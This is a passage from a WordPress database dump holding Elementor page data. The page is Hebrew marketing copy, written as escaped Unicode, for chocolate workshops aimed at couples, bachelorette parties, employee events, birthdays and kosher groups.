\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. <br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h3><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h3><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. <br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8. <br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2250,427,'_elementor_edit_mode','builder'),(2251,427,'_elementor_template_type','wp-page'),(2252,427,'_elementor_version','2.7.5'),(2253,427,'_elementor_pro_version','2.7.3'),(2254,427,'_wp_page_template','elementor_header_footer'),(2255,427,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2256,427,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, 